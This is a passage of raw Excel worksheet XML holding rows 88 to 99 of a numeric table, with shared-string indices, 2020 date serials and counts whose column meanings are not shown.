        <v>0</v>
      </c>
      <c r="AX88">
        <v>0</v>
      </c>
      <c r="AY88">
        <v>5</v>
      </c>
      <c r="AZ88">
        <v>5</v>
      </c>
      <c r="BA88" t="s">
        <v>17286</v>
      </c>
      <c r="BB88" t="s">
        <v>14655</v>
      </c>
      <c r="BC88" t="s">
        <v>11037</v>
      </c>
      <c r="BD88">
        <v>0</v>
      </c>
    </row>
    <row r="89" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A89">
        <v>596</v>
      </c>
      <c r="B89" t="s">
        <v>835</v>
      </c>
      <c r="C89" t="s">
        <v>99</v>
      </c>
      <c r="D89" t="s">
        <v>836</v>
      </c>
      <c r="E89" t="s">
        <v>111</v>
      </c>
      <c r="F89" t="s">
        <v>837</v>
      </c>
      <c r="G89" s="1">
        <v>43959</v>
      </c>
      <c r="H89">
        <v>2471</v>
      </c>
      <c r="I89">
        <v>2471</v>
      </c>
      <c r="J89">
        <v>0</v>
      </c>
      <c r="K89">
        <v>1</v>
      </c>
      <c r="L89">
        <v>0</v>
      </c>
      <c r="M89">
        <v>2</v>
      </c>
      <c r="N89">
        <v>0</v>
      </c>
      <c r="O89">
        <v>0</v>
      </c>
      <c r="P89">
        <v>0</v>
      </c>
      <c r="Q89">
        <v>1</v>
      </c>
      <c r="R89">
        <v>10</v>
      </c>
      <c r="S89">
        <v>0</v>
      </c>
      <c r="T89">
        <v>1</v>
      </c>
      <c r="U89">
        <v>0</v>
      </c>
      <c r="V89">
        <v>500000</v>
      </c>
      <c r="W89">
        <v>0</v>
      </c>
      <c r="X89">
        <v>2500</v>
      </c>
      <c r="Y89">
        <v>0</v>
      </c>
      <c r="Z89">
        <v>0</v>
      </c>
      <c r="AA89">
        <v>0</v>
      </c>
      <c r="AB89">
        <v>1000</v>
      </c>
      <c r="AC89">
        <v>5000</v>
      </c>
      <c r="AD89">
        <v>0</v>
      </c>
      <c r="AE89">
        <v>5000</v>
      </c>
      <c r="AF89" t="s">
        <v>838</v>
      </c>
      <c r="AG89">
        <v>14450</v>
      </c>
      <c r="AH89">
        <v>12</v>
      </c>
      <c r="AJ89">
        <v>160</v>
      </c>
      <c r="AK89" t="s">
        <v>114</v>
      </c>
      <c r="AL89" t="s">
        <v>115</v>
      </c>
      <c r="AM89" t="s">
        <v>839</v>
      </c>
      <c r="AN89" t="s">
        <v>55</v>
      </c>
      <c r="AO89">
        <v>2013</v>
      </c>
      <c r="AP89">
        <v>216603293</v>
      </c>
      <c r="AQ89" t="s">
        <v>840</v>
      </c>
      <c r="AR89" t="s">
        <v>838</v>
      </c>
      <c r="AS89" t="s">
        <v>71</v>
      </c>
      <c r="AT89" t="s">
        <v>58</v>
      </c>
      <c r="AU89">
        <v>0</v>
      </c>
      <c r="AV89">
        <v>0</v>
      </c>
      <c r="AW89">
        <v>0</v>
      </c>
      <c r="AX89">
        <v>0</v>
      </c>
      <c r="AY89">
        <v>12</v>
      </c>
      <c r="AZ89">
        <v>2</v>
      </c>
      <c r="BA89" t="s">
        <v>17291</v>
      </c>
      <c r="BB89" t="s">
        <v>14705</v>
      </c>
      <c r="BC89" t="s">
        <v>9550</v>
      </c>
      <c r="BD89" t="s">
        <v>10045</v>
      </c>
    </row>
    <row r="90" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A90">
        <v>385</v>
      </c>
      <c r="B90" t="s">
        <v>841</v>
      </c>
      <c r="C90" t="s">
        <v>74</v>
      </c>
      <c r="D90" t="s">
        <v>842</v>
      </c>
      <c r="E90" t="s">
        <v>843</v>
      </c>
      <c r="F90" t="s">
        <v>844</v>
      </c>
      <c r="G90" s="1">
        <v>43991</v>
      </c>
      <c r="H90">
        <v>2488</v>
      </c>
      <c r="I90">
        <v>2488</v>
      </c>
      <c r="J90">
        <v>0</v>
      </c>
      <c r="K90">
        <v>0</v>
      </c>
      <c r="L90">
        <v>0</v>
      </c>
      <c r="M90">
        <v>0</v>
      </c>
      <c r="N90">
        <v>0</v>
      </c>
      <c r="O90">
        <v>0</v>
      </c>
      <c r="P90">
        <v>0</v>
      </c>
      <c r="Q90">
        <v>0</v>
      </c>
      <c r="R90">
        <v>0</v>
      </c>
      <c r="S90">
        <v>0</v>
      </c>
      <c r="T90">
        <v>1</v>
      </c>
      <c r="U90">
        <v>0</v>
      </c>
      <c r="V90">
        <v>0</v>
      </c>
      <c r="W90">
        <v>0</v>
      </c>
      <c r="X90">
        <v>0</v>
      </c>
      <c r="Y90">
        <v>0</v>
      </c>
      <c r="Z90">
        <v>0</v>
      </c>
      <c r="AA90">
        <v>0</v>
      </c>
      <c r="AB90">
        <v>0</v>
      </c>
      <c r="AC90">
        <v>0</v>
      </c>
      <c r="AD90">
        <v>0</v>
      </c>
      <c r="AE90">
        <v>3000</v>
      </c>
      <c r="AF90" t="s">
        <v>845</v>
      </c>
      <c r="AG90">
        <v>59641</v>
      </c>
      <c r="AH90">
        <v>14</v>
      </c>
      <c r="AJ90">
        <v>207</v>
      </c>
      <c r="AK90" t="s">
        <v>846</v>
      </c>
      <c r="AL90" t="s">
        <v>847</v>
      </c>
      <c r="AM90" t="s">
        <v>848</v>
      </c>
      <c r="AN90" t="s">
        <v>55</v>
      </c>
      <c r="AO90">
        <v>2017</v>
      </c>
      <c r="AP90">
        <v>81325015900</v>
      </c>
      <c r="AQ90" t="s">
        <v>849</v>
      </c>
      <c r="AR90" t="s">
        <v>850</v>
      </c>
      <c r="AS90" t="s">
        <v>71</v>
      </c>
      <c r="AT90" t="s">
        <v>58</v>
      </c>
      <c r="AU90">
        <v>25</v>
      </c>
      <c r="AV90">
        <v>0</v>
      </c>
      <c r="AW90">
        <v>7</v>
      </c>
      <c r="AX90">
        <v>0</v>
      </c>
      <c r="AY90">
        <v>3</v>
      </c>
      <c r="AZ90">
        <v>1</v>
      </c>
      <c r="BA90" t="s">
        <v>17280</v>
      </c>
      <c r="BB90" t="s">
        <v>14533</v>
      </c>
      <c r="BC90">
        <v>0</v>
      </c>
      <c r="BD90" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="91" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A91">
        <v>571</v>
      </c>
      <c r="B91" t="s">
        <v>851</v>
      </c>
      <c r="C91" t="s">
        <v>579</v>
      </c>
      <c r="D91" t="s">
        <v>852</v>
      </c>
      <c r="E91" t="s">
        <v>528</v>
      </c>
      <c r="F91" t="s">
        <v>853</v>
      </c>
      <c r="G91" s="1">
        <v>43962</v>
      </c>
      <c r="H91">
        <v>2519</v>
      </c>
      <c r="I91">
        <v>2519</v>
      </c>
      <c r="J91">
        <v>0</v>
      </c>
      <c r="K91">
        <v>0</v>
      </c>
      <c r="L91">
        <v>0</v>
      </c>
      <c r="M91">
        <v>0</v>
      </c>
      <c r="N91">
        <v>0</v>
      </c>
      <c r="O91">
        <v>0</v>
      </c>
      <c r="P91">
        <v>0</v>
      </c>
      <c r="Q91">
        <v>0</v>
      </c>
      <c r="R91">
        <v>0</v>
      </c>
      <c r="S91">
        <v>0</v>
      </c>
      <c r="T91">
        <v>1</v>
      </c>
      <c r="U91">
        <v>0</v>
      </c>
      <c r="V91">
        <v>0</v>
      </c>
      <c r="W91">
        <v>0</v>
      </c>
      <c r="X91">
        <v>0</v>
      </c>
      <c r="Y91">
        <v>0</v>
      </c>
      <c r="Z91">
        <v>0</v>
      </c>
      <c r="AA91">
        <v>0</v>
      </c>
      <c r="AB91">
        <v>0</v>
      </c>
      <c r="AC91">
        <v>0</v>
      </c>
      <c r="AD91">
        <v>0</v>
      </c>
      <c r="AE91">
        <v>1000</v>
      </c>
      <c r="AF91" t="s">
        <v>854</v>
      </c>
      <c r="AG91">
        <v>76116</v>
      </c>
      <c r="AH91">
        <v>23</v>
      </c>
      <c r="AJ91">
        <v>363</v>
      </c>
      <c r="AK91" t="s">
        <v>583</v>
      </c>
      <c r="AL91" t="s">
        <v>584</v>
      </c>
      <c r="AM91" t="s">
        <v>855</v>
      </c>
      <c r="AN91" t="s">
        <v>68</v>
      </c>
      <c r="AO91">
        <v>2003</v>
      </c>
      <c r="AP91">
        <v>81350730391</v>
      </c>
      <c r="AQ91" t="s">
        <v>856</v>
      </c>
      <c r="AR91" t="s">
        <v>854</v>
      </c>
      <c r="AS91" t="s">
        <v>71</v>
      </c>
      <c r="AT91" t="s">
        <v>72</v>
      </c>
      <c r="AU91">
        <v>25</v>
      </c>
      <c r="AV91">
        <v>0</v>
      </c>
      <c r="AW91">
        <v>0</v>
      </c>
      <c r="AX91">
        <v>0</v>
      </c>
      <c r="AY91">
        <v>6</v>
      </c>
      <c r="AZ91">
        <v>14</v>
      </c>
      <c r="BA91" t="s">
        <v>17327</v>
      </c>
      <c r="BB91" t="s">
        <v>14683</v>
      </c>
      <c r="BC91" t="s">
        <v>10599</v>
      </c>
      <c r="BD91">
        <v>0</v>
      </c>
    </row>
    <row r="92" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A92">
        <v>609</v>
      </c>
      <c r="B92" t="s">
        <v>857</v>
      </c>
      <c r="C92" t="s">
        <v>318</v>
      </c>
      <c r="D92" t="s">
        <v>858</v>
      </c>
      <c r="E92" t="s">
        <v>843</v>
      </c>
      <c r="F92" t="s">
        <v>859</v>
      </c>
      <c r="G92" s="1">
        <v>44106</v>
      </c>
      <c r="H92">
        <v>2545</v>
      </c>
      <c r="I92">
        <v>2545</v>
      </c>
      <c r="J92">
        <v>0</v>
      </c>
      <c r="K92">
        <v>1</v>
      </c>
      <c r="L92">
        <v>0</v>
      </c>
      <c r="M92">
        <v>0</v>
      </c>
      <c r="N92">
        <v>0</v>
      </c>
      <c r="O92">
        <v>0</v>
      </c>
      <c r="P92">
        <v>0</v>
      </c>
      <c r="Q92">
        <v>6</v>
      </c>
      <c r="R92">
        <v>6</v>
      </c>
      <c r="S92">
        <v>0</v>
      </c>
      <c r="T92">
        <v>1</v>
      </c>
      <c r="U92">
        <v>0</v>
      </c>
      <c r="V92">
        <v>1</v>
      </c>
      <c r="W92">
        <v>0</v>
      </c>
      <c r="X92">
        <v>0</v>
      </c>
      <c r="Y92">
        <v>0</v>
      </c>
      <c r="Z92">
        <v>0</v>
      </c>
      <c r="AA92">
        <v>0</v>
      </c>
      <c r="AB92">
        <v>100</v>
      </c>
      <c r="AC92">
        <v>600</v>
      </c>
      <c r="AD92">
        <v>0</v>
      </c>
      <c r="AE92">
        <v>1000</v>
      </c>
      <c r="AF92" t="s">
        <v>860</v>
      </c>
      <c r="AG92">
        <v>90212</v>
      </c>
      <c r="AH92">
        <v>26</v>
      </c>
      <c r="AJ92">
        <v>420</v>
      </c>
      <c r="AK92" t="s">
        <v>861</v>
      </c>
      <c r="AL92" t="s">
        <v>861</v>
      </c>
      <c r="AM92" t="s">
        <v>862</v>
      </c>
      <c r="AN92" t="s">
        <v>68</v>
      </c>
      <c r="AO92">
        <v>2015</v>
      </c>
      <c r="AP92">
        <v>4118942368</v>
      </c>
      <c r="AQ92">
        <v>81355355354</v>
      </c>
      <c r="AR92" t="s">
        <v>860</v>
      </c>
      <c r="AS92" t="s">
        <v>71</v>
      </c>
      <c r="AT92" t="s">
        <v>72</v>
      </c>
      <c r="AU92">
        <v>24</v>
      </c>
      <c r="AV92">
        <v>0</v>
      </c>
      <c r="AW92">
        <v>6</v>
      </c>
      <c r="AX92">
        <v>5</v>
      </c>
      <c r="AY92">
        <v>6</v>
      </c>
      <c r="AZ92">
        <v>1</v>
      </c>
      <c r="BA92" t="s">
        <v>16725</v>
      </c>
      <c r="BB92" t="s">
        <v>14715</v>
      </c>
      <c r="BC92">
        <v>0</v>
      </c>
      <c r="BD92" t="s">
        <v>10148</v>
      </c>
    </row>
    <row r="93" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A93">
        <v>482</v>
      </c>
      <c r="B93" t="s">
        <v>863</v>
      </c>
      <c r="C93" t="s">
        <v>215</v>
      </c>
      <c r="D93" t="s">
        <v>864</v>
      </c>
      <c r="E93" t="s">
        <v>142</v>
      </c>
      <c r="F93" t="s">
        <v>865</v>
      </c>
      <c r="G93" s="1">
        <v>43927</v>
      </c>
      <c r="H93">
        <v>2575</v>
      </c>
      <c r="I93">
        <v>2575</v>
      </c>
      <c r="J93">
        <v>1</v>
      </c>
      <c r="K93">
        <v>0</v>
      </c>
      <c r="L93">
        <v>1</v>
      </c>
      <c r="M93">
        <v>0</v>
      </c>
      <c r="N93">
        <v>0</v>
      </c>
      <c r="O93">
        <v>0</v>
      </c>
      <c r="P93">
        <v>0</v>
      </c>
      <c r="Q93">
        <v>5</v>
      </c>
      <c r="R93">
        <v>10</v>
      </c>
      <c r="S93">
        <v>0</v>
      </c>
      <c r="T93">
        <v>1</v>
      </c>
      <c r="U93">
        <v>70000</v>
      </c>
      <c r="V93">
        <v>0</v>
      </c>
      <c r="W93">
        <v>5000</v>
      </c>
      <c r="X93">
        <v>0</v>
      </c>
      <c r="Y93">
        <v>0</v>
      </c>
      <c r="Z93">
        <v>0</v>
      </c>
      <c r="AA93">
        <v>0</v>
      </c>
      <c r="AB93">
        <v>500</v>
      </c>
      <c r="AC93">
        <v>5000</v>
      </c>
      <c r="AD93">
        <v>0</v>
      </c>
      <c r="AE93">
        <v>3000</v>
      </c>
      <c r="AF93" t="s">
        <v>866</v>
      </c>
      <c r="AG93">
        <v>33411</v>
      </c>
      <c r="AH93">
        <v>6</v>
      </c>
      <c r="AJ93">
        <v>142</v>
      </c>
      <c r="AK93" t="s">
        <v>219</v>
      </c>
      <c r="AL93" t="s">
        <v>220</v>
      </c>
      <c r="AM93" t="s">
        <v>867</v>
      </c>
      <c r="AN93" t="s">
        <v>55</v>
      </c>
      <c r="AO93">
        <v>2002</v>
      </c>
      <c r="AP93" t="s">
        <v>868</v>
      </c>
      <c r="AQ93" t="s">
        <v>869</v>
      </c>
      <c r="AR93" t="s">
        <v>870</v>
      </c>
      <c r="AS93" t="s">
        <v>71</v>
      </c>
      <c r="AT93" t="s">
        <v>58</v>
      </c>
      <c r="AU93">
        <v>350</v>
      </c>
      <c r="AV93">
        <v>1</v>
      </c>
      <c r="AW93">
        <v>0</v>
      </c>
      <c r="AX93">
        <v>25</v>
      </c>
      <c r="AY93">
        <v>14</v>
      </c>
      <c r="AZ93">
        <v>10</v>
      </c>
      <c r="BA93" t="s">
        <v>16704</v>
      </c>
      <c r="BB93" t="s">
        <v>14610</v>
      </c>
      <c r="BC93" t="s">
        <v>10621</v>
      </c>
      <c r="BD93" t="s">
        <v>9994</v>
      </c>
    </row>
    <row r="94" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A94">
        <v>578</v>
      </c>
      <c r="B94" t="s">
        <v>871</v>
      </c>
      <c r="C94" t="s">
        <v>872</v>
      </c>
      <c r="D94" t="s">
        <v>873</v>
      </c>
      <c r="E94" t="s">
        <v>142</v>
      </c>
      <c r="F94" t="s">
        <v>874</v>
      </c>
      <c r="G94" s="1">
        <v>43959</v>
      </c>
      <c r="H94">
        <v>2613</v>
      </c>
      <c r="I94">
        <v>2613</v>
      </c>
      <c r="J94">
        <v>2</v>
      </c>
      <c r="K94">
        <v>0</v>
      </c>
      <c r="L94">
        <v>2</v>
      </c>
      <c r="M94">
        <v>0</v>
      </c>
      <c r="N94">
        <v>0</v>
      </c>
      <c r="O94">
        <v>0</v>
      </c>
      <c r="P94">
        <v>0</v>
      </c>
      <c r="Q94">
        <v>0</v>
      </c>
      <c r="R94">
        <v>0</v>
      </c>
      <c r="S94">
        <v>0</v>
      </c>
      <c r="T94">
        <v>0</v>
      </c>
      <c r="U94">
        <v>100000</v>
      </c>
      <c r="V94">
        <v>0</v>
      </c>
      <c r="W94">
        <v>7000</v>
      </c>
      <c r="X94">
        <v>0</v>
      </c>
      <c r="Y94">
        <v>0</v>
      </c>
      <c r="Z94">
        <v>0</v>
      </c>
      <c r="AA94">
        <v>0</v>
      </c>
      <c r="AB94">
        <v>0</v>
      </c>
      <c r="AC94">
        <v>0</v>
      </c>
      <c r="AD94">
        <v>0</v>
      </c>
      <c r="AE94">
        <v>0</v>
      </c>
      <c r="AF94" t="s">
        <v>875</v>
      </c>
      <c r="AG94">
        <v>94711</v>
      </c>
      <c r="AH94">
        <v>28</v>
      </c>
      <c r="AJ94">
        <v>387</v>
      </c>
      <c r="AK94" t="s">
        <v>876</v>
      </c>
      <c r="AL94" t="s">
        <v>877</v>
      </c>
      <c r="AM94" t="s">
        <v>878</v>
      </c>
      <c r="AN94" t="s">
        <v>55</v>
      </c>
      <c r="AO94">
        <v>2015</v>
      </c>
      <c r="AP94">
        <v>4613224497</v>
      </c>
      <c r="AQ94" t="s">
        <v>879</v>
      </c>
      <c r="AR94" t="s">
        <v>880</v>
      </c>
      <c r="AU94">
        <v>25</v>
      </c>
      <c r="AV94">
        <v>1</v>
      </c>
      <c r="AW94">
        <v>15</v>
      </c>
      <c r="AX94">
        <v>30</v>
      </c>
      <c r="AY94">
        <v>1</v>
      </c>
      <c r="AZ94">
        <v>1</v>
      </c>
      <c r="BA94" t="s">
        <v>16644</v>
      </c>
      <c r="BB94" t="s">
        <v>14690</v>
      </c>
      <c r="BC94" t="s">
        <v>10610</v>
      </c>
      <c r="BD94">
        <v>0</v>
      </c>
    </row>
    <row r="95" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A95">
        <v>689</v>
      </c>
      <c r="B95" t="s">
        <v>881</v>
      </c>
      <c r="C95" t="s">
        <v>157</v>
      </c>
      <c r="D95" t="s">
        <v>882</v>
      </c>
      <c r="E95" t="s">
        <v>363</v>
      </c>
      <c r="F95" t="s">
        <v>883</v>
      </c>
      <c r="G95" s="1">
        <v>43980</v>
      </c>
      <c r="H95">
        <v>2635</v>
      </c>
      <c r="I95">
        <v>2635</v>
      </c>
      <c r="J95">
        <v>0</v>
      </c>
      <c r="K95">
        <v>0</v>
      </c>
      <c r="L95">
        <v>0</v>
      </c>
      <c r="M95">
        <v>4</v>
      </c>
      <c r="N95">
        <v>0</v>
      </c>
      <c r="O95">
        <v>0</v>
      </c>
      <c r="P95">
        <v>0</v>
      </c>
      <c r="Q95">
        <v>3</v>
      </c>
      <c r="R95">
        <v>3</v>
      </c>
      <c r="S95">
        <v>0</v>
      </c>
      <c r="T95">
        <v>6</v>
      </c>
      <c r="U95">
        <v>0</v>
      </c>
      <c r="V95">
        <v>0</v>
      </c>
      <c r="W95">
        <v>0</v>
      </c>
      <c r="X95">
        <v>500</v>
      </c>
      <c r="Y95">
        <v>0</v>
      </c>
      <c r="Z95">
        <v>0</v>
      </c>
      <c r="AA95">
        <v>0</v>
      </c>
      <c r="AB95">
        <v>300</v>
      </c>
      <c r="AC95">
        <v>300</v>
      </c>
      <c r="AD95">
        <v>0</v>
      </c>
      <c r="AE95">
        <v>15000</v>
      </c>
      <c r="AF95" t="s">
        <v>884</v>
      </c>
      <c r="AG95">
        <v>60124</v>
      </c>
      <c r="AH95">
        <v>16</v>
      </c>
      <c r="AJ95">
        <v>264</v>
      </c>
      <c r="AK95" t="s">
        <v>885</v>
      </c>
      <c r="AL95" t="s">
        <v>885</v>
      </c>
      <c r="AM95" t="s">
        <v>886</v>
      </c>
      <c r="AN95" t="s">
        <v>55</v>
      </c>
      <c r="AO95">
        <v>2017</v>
      </c>
      <c r="AP95" t="s">
        <v>887</v>
      </c>
      <c r="AQ95" t="s">
        <v>888</v>
      </c>
      <c r="AR95" t="s">
        <v>889</v>
      </c>
      <c r="AS95" t="s">
        <v>71</v>
      </c>
      <c r="AT95" t="s">
        <v>58</v>
      </c>
      <c r="AU95">
        <v>6</v>
      </c>
      <c r="AV95">
        <v>1</v>
      </c>
      <c r="AW95">
        <v>0</v>
      </c>
      <c r="AX95">
        <v>0</v>
      </c>
      <c r="AY95">
        <v>3</v>
      </c>
      <c r="AZ95">
        <v>1</v>
      </c>
      <c r="BA95" t="s">
        <v>16738</v>
      </c>
      <c r="BB95" t="s">
        <v>14778</v>
      </c>
      <c r="BC95" t="s">
        <v>10442</v>
      </c>
      <c r="BD95" t="s">
        <v>10298</v>
      </c>
    </row>
    <row r="96" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A96">
        <v>379</v>
      </c>
      <c r="B96" t="s">
        <v>890</v>
      </c>
      <c r="C96" t="s">
        <v>99</v>
      </c>
      <c r="D96" t="s">
        <v>891</v>
      </c>
      <c r="E96" t="s">
        <v>111</v>
      </c>
      <c r="F96" t="s">
        <v>892</v>
      </c>
      <c r="G96" s="1">
        <v>43899</v>
      </c>
      <c r="H96">
        <v>2659</v>
      </c>
      <c r="I96">
        <v>2659</v>
      </c>
      <c r="J96">
        <v>0</v>
      </c>
      <c r="K96">
        <v>1</v>
      </c>
      <c r="L96">
        <v>0</v>
      </c>
      <c r="M96">
        <v>0</v>
      </c>
      <c r="N96">
        <v>0</v>
      </c>
      <c r="O96">
        <v>0</v>
      </c>
      <c r="P96">
        <v>0</v>
      </c>
      <c r="Q96">
        <v>0</v>
      </c>
      <c r="R96">
        <v>0</v>
      </c>
      <c r="S96">
        <v>0</v>
      </c>
      <c r="T96">
        <v>0</v>
      </c>
      <c r="U96">
        <v>0</v>
      </c>
      <c r="V96">
        <v>1000</v>
      </c>
      <c r="W96">
        <v>0</v>
      </c>
      <c r="X96">
        <v>0</v>
      </c>
      <c r="Y96">
        <v>0</v>
      </c>
      <c r="Z96">
        <v>0</v>
      </c>
      <c r="AA96">
        <v>0</v>
      </c>
      <c r="AB96">
        <v>0</v>
      </c>
      <c r="AC96">
        <v>0</v>
      </c>
      <c r="AD96">
        <v>0</v>
      </c>
      <c r="AE96">
        <v>0</v>
      </c>
      <c r="AF96" t="s">
        <v>893</v>
      </c>
      <c r="AG96">
        <v>14440</v>
      </c>
      <c r="AH96">
        <v>12</v>
      </c>
      <c r="AJ96">
        <v>160</v>
      </c>
      <c r="AK96" t="s">
        <v>114</v>
      </c>
      <c r="AL96" t="s">
        <v>114</v>
      </c>
      <c r="AM96" t="s">
        <v>894</v>
      </c>
      <c r="AN96" t="s">
        <v>68</v>
      </c>
      <c r="AO96">
        <v>2010</v>
      </c>
      <c r="AP96">
        <v>219771150</v>
      </c>
      <c r="AQ96" t="s">
        <v>895</v>
      </c>
      <c r="AR96" t="s">
        <v>896</v>
      </c>
      <c r="AS96" t="s">
        <v>179</v>
      </c>
      <c r="AT96" t="s">
        <v>58</v>
      </c>
      <c r="AU96">
        <v>27</v>
      </c>
      <c r="AV96">
        <v>0</v>
      </c>
      <c r="AW96">
        <v>5</v>
      </c>
      <c r="AX96">
        <v>0</v>
      </c>
      <c r="AY96">
        <v>3</v>
      </c>
      <c r="AZ96">
        <v>3</v>
      </c>
      <c r="BA96" t="s">
        <v>16678</v>
      </c>
      <c r="BB96" t="s">
        <v>14527</v>
      </c>
      <c r="BC96" t="s">
        <v>9550</v>
      </c>
      <c r="BD96" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="97" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A97">
        <v>420</v>
      </c>
      <c r="B97" t="s">
        <v>897</v>
      </c>
      <c r="C97" t="s">
        <v>477</v>
      </c>
      <c r="D97" t="s">
        <v>898</v>
      </c>
      <c r="E97" t="s">
        <v>300</v>
      </c>
      <c r="F97" t="s">
        <v>899</v>
      </c>
      <c r="G97" s="1">
        <v>43971</v>
      </c>
      <c r="H97">
        <v>2679</v>
      </c>
      <c r="I97">
        <v>2679</v>
      </c>
      <c r="J97">
        <v>1</v>
      </c>
      <c r="K97">
        <v>2</v>
      </c>
      <c r="L97">
        <v>1</v>
      </c>
      <c r="M97">
        <v>0</v>
      </c>
      <c r="N97">
        <v>0</v>
      </c>
      <c r="O97">
        <v>0</v>
      </c>
      <c r="P97">
        <v>0</v>
      </c>
      <c r="Q97">
        <v>0</v>
      </c>
      <c r="R97">
        <v>3</v>
      </c>
      <c r="S97">
        <v>1</v>
      </c>
      <c r="T97">
        <v>0</v>
      </c>
      <c r="U97">
        <v>30000</v>
      </c>
      <c r="V97">
        <v>2</v>
      </c>
      <c r="W97">
        <v>3000</v>
      </c>
      <c r="X97">
        <v>0</v>
      </c>
      <c r="Y97">
        <v>0</v>
      </c>
      <c r="Z97">
        <v>0</v>
      </c>
      <c r="AA97">
        <v>0</v>
      </c>
      <c r="AB97">
        <v>0</v>
      </c>
      <c r="AC97">
        <v>3000</v>
      </c>
      <c r="AD97">
        <v>1</v>
      </c>
      <c r="AE97">
        <v>0</v>
      </c>
      <c r="AF97" t="s">
        <v>900</v>
      </c>
      <c r="AG97">
        <v>95370</v>
      </c>
      <c r="AH97">
        <v>29</v>
      </c>
      <c r="AJ97">
        <v>372</v>
      </c>
      <c r="AK97" t="s">
        <v>901</v>
      </c>
      <c r="AL97" t="s">
        <v>902</v>
      </c>
      <c r="AM97" t="s">
        <v>903</v>
      </c>
      <c r="AN97" t="s">
        <v>55</v>
      </c>
      <c r="AO97">
        <v>2011</v>
      </c>
      <c r="AP97" t="s">
        <v>904</v>
      </c>
      <c r="AQ97">
        <v>811431182</v>
      </c>
      <c r="AR97" t="s">
        <v>900</v>
      </c>
      <c r="AS97" t="s">
        <v>371</v>
      </c>
      <c r="AT97" t="s">
        <v>72</v>
      </c>
      <c r="AU97">
        <v>25</v>
      </c>
      <c r="AV97">
        <v>0</v>
      </c>
      <c r="AW97">
        <v>30</v>
      </c>
      <c r="AX97">
        <v>3</v>
      </c>
      <c r="AY97">
        <v>7</v>
      </c>
      <c r="AZ97">
        <v>7</v>
      </c>
      <c r="BA97" t="s">
        <v>17345</v>
      </c>
      <c r="BB97" t="s">
        <v>14558</v>
      </c>
      <c r="BC97" t="s">
        <v>9536</v>
      </c>
      <c r="BD97" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="98" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A98">
        <v>743</v>
      </c>
      <c r="B98" t="s">
        <v>905</v>
      </c>
      <c r="C98" t="s">
        <v>157</v>
      </c>
      <c r="D98" t="s">
        <v>906</v>
      </c>
      <c r="E98" t="s">
        <v>142</v>
      </c>
      <c r="F98" t="s">
        <v>907</v>
      </c>
      <c r="G98" s="1">
        <v>44159</v>
      </c>
      <c r="H98">
        <v>2686</v>
      </c>
      <c r="I98">
        <v>2686</v>
      </c>
      <c r="J98">
        <v>1</v>
      </c>
      <c r="K98">
        <v>0</v>
      </c>
      <c r="L98">
        <v>1</v>
      </c>
      <c r="M98">
        <v>0</v>
      </c>
      <c r="N98">
        <v>0</v>
      </c>
      <c r="O98">
        <v>0</v>
      </c>
      <c r="P98">
        <v>0</v>
      </c>
      <c r="Q98">
        <v>0</v>
      </c>
      <c r="R98">
        <v>2</v>
      </c>
      <c r="S98">
        <v>0</v>
      </c>
      <c r="T98">
        <v>1</v>
      </c>
      <c r="U98">
        <v>200000</v>
      </c>
      <c r="V98">
        <v>0</v>
      </c>
      <c r="W98">
        <v>3500</v>
      </c>
      <c r="X98">
        <v>0</v>
      </c>
      <c r="Y98">
        <v>0</v>
      </c>
      <c r="Z98">
        <v>0</v>
      </c>
      <c r="AA98">
        <v>0</v>
      </c>
      <c r="AB98">
        <v>0</v>
      </c>
      <c r="AC98">
        <v>300</v>
      </c>
      <c r="AD98">
        <v>0</v>
      </c>
      <c r="AE98">
        <v>2500</v>
      </c>
      <c r="AF98" t="s">
        <v>908</v>
      </c>
      <c r="AG98">
        <v>61254</v>
      </c>
      <c r="AH98">
        <v>16</v>
      </c>
      <c r="AJ98">
        <v>242</v>
      </c>
      <c r="AK98" t="s">
        <v>490</v>
      </c>
      <c r="AL98" t="s">
        <v>909</v>
      </c>
      <c r="AM98" t="s">
        <v>910</v>
      </c>
      <c r="AN98" t="s">
        <v>55</v>
      </c>
      <c r="AO98">
        <v>2009</v>
      </c>
      <c r="AP98" t="s">
        <v>911</v>
      </c>
      <c r="AQ98" t="s">
        <v>912</v>
      </c>
      <c r="AR98" t="s">
        <v>913</v>
      </c>
      <c r="AS98" t="s">
        <v>71</v>
      </c>
      <c r="AT98" t="s">
        <v>58</v>
      </c>
      <c r="AU98">
        <v>26</v>
      </c>
      <c r="AV98">
        <v>1</v>
      </c>
      <c r="AW98">
        <v>32</v>
      </c>
      <c r="AX98">
        <v>23</v>
      </c>
      <c r="AY98">
        <v>6</v>
      </c>
      <c r="AZ98">
        <v>7</v>
      </c>
      <c r="BA98" t="s">
        <v>17452</v>
      </c>
      <c r="BB98" t="s">
        <v>14820</v>
      </c>
      <c r="BC98" t="s">
        <v>11192</v>
      </c>
      <c r="BD98" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="99" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A99">
        <v>502</v>
      </c>
      <c r="B99" t="s">
        <v>914</v>
      </c>
      <c r="C99" t="s">
        <v>224</v>
      </c>
      <c r="D99" t="s">
        <v>915</v>
      </c>
      <c r="E99" t="s">
        <v>916</v>
      </c>
      <c r="F99" t="s">
        <v>917</v>
      </c>
      <c r="G99" s="1">
        <v>44046</v>
      </c>
      <c r="H99">
        <v>2688</v>
      </c>
      <c r="I99">
        <v>2688</v>
      </c>
      <c r="J99">
        <v>0</v>
      </c>
      <c r="K99">
        <v>0</v>
      </c>
      <c r="L99">
        <v>0</v>
      </c>
      <c r="M99">
        <v>0</v>
      </c>
      <c r="N99">
        <v>0</v>
      </c>
      <c r="O99">
        <v>0</v>
      </c>
      <c r="P99">
        <v>0</v>
      </c>
      <c r="Q99">
        <v>1</v>
      </c>
      <c r="R99">
        <v>0</v>
      </c>
      <c r="S99">
        <v>0</v>
      </c>
      <c r="T99">
        <v>0</v>
      </c>
      <c r="U99">
        <v>0</v>
      </c>
      <c r="V99">
        <v>0</v>
      </c>
      <c r="W99">
        <v>0</v>
      </c>
      <c r="X99">
        <v>0</v>
      </c>
      <c r="Y99">
